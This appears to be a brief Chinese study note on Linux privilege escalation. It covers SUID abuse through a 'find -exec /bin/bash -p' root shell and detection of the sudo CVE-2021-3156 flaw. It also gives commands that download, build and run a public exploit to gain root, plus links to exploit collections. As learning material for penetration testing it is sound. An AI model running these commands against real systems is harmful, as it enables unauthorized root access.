linux提权
提权
metasplitable2:msfadmin/msfadmin
searchsploit: 查找漏洞
1 | linux木马生成: |
suid提权
suid:默认会以特权用户的权限去执行
s:特权用户
加入有suid文件可以进入交互模式,那么就可以用提权或者做后门.
less | more | tail
apt | apt-get….
提权步骤:
find / -perm -u=s -type f 2>/dev/null –> 查找具有suid权限的文件
以find命令为例:
find /etc/passwd -exec /bin/bash -p ; –> 利用文件进入root权限的bash
1 |
文件权限:
-:代表文件
l:代表链接(软链接–>快捷方式;硬链接–>复制了一份源文件)
d:代表目录
r 4:可读(read)
w 2:可写(write)
x 1:可执行(execution)
d rwx r-x r-x
d:目录
rwx:当前用户的权限
r-x:当前用户组的权限
r-x:其他用户组的权限
1 |
|
漏洞探测:
用户可以使用非root的账户登录系统,运行“ sudoedit -s / ”命令,
若返回如图以“ sudoedit:”开头的错误,则当前系统可能存在安全风险。
不受影响的系统将显示以“ usage:”开头的错误响应。
影响范围:
Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1
poc地址: https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
利用:
wget https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
tar -zxvf CVE-2021-3156_nss_poc_ubuntu.tar.gz
cd CVE-2021-3156
chmod u+x *
make
./sudo-hax-me-a-sandwich 0
linux漏洞库:
https://github.com/qazbnm456/awesome-cve-poc
https://github.com/SecWiki/linux-kernel-exploits
shellcode: 机器码(二进制,十六进制)